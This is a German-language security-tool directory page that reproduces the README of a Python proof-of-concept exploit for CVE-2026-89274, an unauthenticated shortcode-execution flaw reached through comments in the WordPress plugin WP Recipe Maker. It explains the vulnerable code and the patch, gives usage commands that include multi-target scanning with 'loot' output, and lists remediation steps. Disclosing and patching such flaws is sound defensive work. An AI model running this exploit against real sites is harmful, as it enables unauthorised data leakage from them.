Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
By-Poloss..-.CVE-2026-89274 — Python-PoC-Exploit für CVE-2026-89274, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung in WordPress WP Recipe Maker <= 10.8.1 über Rezeptkommentare. | Kitploit
Tools/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

Python-PoC-Exploit für CVE-2026-89274, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung in WordPress WP Recipe Maker <= 10.8.1 über Rezeptkommentare.

Repository anzeigen
vor 5h 11mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept-Exploit für CVE-2026-89274 — eine Schwachstelle zur Unauthenticated Arbitrary Shortcode Execution im WordPress-Plugin WP Recipe Maker in der Version ≤ 10.8.1.

⚠️ RECHTLICHER & ETHISCHER HINWEIS Dieses Skript wird ausschließlich für Sicherheitsforschung in einer lokalen Umgebung (localhost/Lab) bereitgestellt und darf nicht gegen Systeme eingesetzt werden, die Ihnen nicht gehören oder für die keine schriftliche Genehmigung vorliegt. Der Autor übernimmt keine Haftung für Missbrauch. Die Nutzung gegen Systeme Dritter ohne Autorisierung kann strafbar sein.


📌 Zusammenfassung der Schwachstelle

FeldWert
CVE IDCVE-2026-89274
ZielWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
KlasseCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
VektorRezept-Kommentarinhalt (unauthenticated)
Sinkdo_shortcode() in class-wprm-metadata.php
AuswirkungServer-seitige Shortcode-Ausführung → Datenleck über öffentliches JSON-LD
AuthorPoloss

Root Cause (Patch-Diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnerable (10.8.1):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() führt den Shortcode zuerst aus, danach bereinigt strip_shortcodes() lediglich die Ausgabe — es gibt keinerlei Schutz.

Patched (10.8.4):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

Datenfluss

root@kitploit:~
comment_content (öffentlicher Kommentar zum Rezept-Post)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK-AUSFÜHRUNG
                   └─> wp_json_encode() nach <script type="application/ld+json">

Voraussetzungen

  1. Der Kommentar enthält das Feld wprm-comment-rating (wird über das Kommentarformular befüllt).
  2. Der Kommentar ist genehmigt (Auto-Approve oder manuell durch einen Moderator).
  3. Es ist keine Authentifizierung erforderlich.

⚙️ Installation

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# Keine externen Abhängigkeiten — nur die Python-3-Standardbibliothek.

Voraussetzungen: Python 3.8+.


🚀 Verwendung

Einzelnes Ziel

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

Mehrere Ziele (Datei)

Format von targets.txt (eine pro Zeile, url[,post_id]):

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# Kommentarzeilen werden ignoriert
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

CLI-Optionen

FlagDefaultBeschreibung
-u, --url—Einzelne Ziel-URL
-f, --file—Datei mit Zielliste (url[,post_id] pro Zeile)
-p, --post10ID des Posts, der das Rezept enthält
-t, --threads5Anzahl der Worker-Threads
-o, --outputcve-2026-89274-loot.jsonJSON-Ausgabedatei
--shortcode[wprm-recipe-name id=11]Auszuführende Shortcode-Payload
--markerPoC RecipeNachweis-Substring der Ausführung in reviewBody
--rating5WPRM-Rating-Wert
--timeout25Timeout pro Request (Sekunden)

🔍 Funktionsweise des Skripts

  1. Baseline — GET der Post-Seite, Extraktion des <script type="application/ld+json">-Blocks, Sammeln von reviewBody.
  2. Kommentar absenden — POST an /wp-comments-post.php mit Payload + Feld wprm-comment-rating.
  3. Polling — erneutes GET der Seite mehrmals, um eine Auto-Genehmigung des Kommentars zu erkennen.
  4. Verifikation — Wenn --marker in reviewBody erscheint → EXPLOITED. Falls nicht → PENDING_APPROVAL.
  5. Ausgabe — Ergebnisse werden in JSON gespeichert.

Ausgabestatus

StatusBedeutung
EXPLOITEDShortcode ausgeführt & Ausgabe in öffentliches JSON-LD geleakt
PENDING_APPROVALKommentar übermittelt, wartet auf Moderator-Genehmigung
FAILSeite nicht erreichbar / Kommentar abgelehnt / Fehler

📄 Beispiel für JSON-Ausgabe

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ Behebung

  • Upgrade von WP Recipe Maker auf ≥ 10.8.4.
  • Deaktivieren Sie vorübergehend Kommentare auf Rezept-Posts oder setzen Sie comment_moderation = 1 und prüfen Sie Kommentare streng.
  • Wenden Sie eine WAF-Regel an, um Shortcode-Syntax ([...]) in Kommentar-Feldern zu blockieren.
  • Prüfen Sie alte Kommentare auf verdächtige Shortcode-Payloads.

📁 Repo-Struktur

root@kitploit:~
.
├── CVE-2026-89274.py           # Haupt-Exploit
└── README.md                   # dieses Dokument
Tool herunterladen